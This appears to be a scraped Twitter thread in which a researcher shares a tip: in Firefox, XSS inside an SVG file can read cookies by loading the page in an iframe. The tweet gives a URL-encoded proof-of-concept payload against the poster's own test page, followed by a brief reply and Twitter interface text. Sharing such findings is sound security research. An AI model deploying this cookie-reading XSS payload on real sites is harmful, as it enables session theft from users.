XSS in SVG file in Firefox and need document.cookie? Use <iframe>: http://avlidienbrunn.com/svg.php?xss=%3C?xml%20version=%221.0%22?%3E%3Csvg%3E%3Cp%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Ciframe%20id=%22x%22%20src=%22/%22%3E%3C/iframe%3E%3Cscript%3Ealert(document.getElementById(%22x%22).contentDocument.cookie)%3C/script%3E%3C/p%3E%3C/svg%3E …
-
-
ah, got it!
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.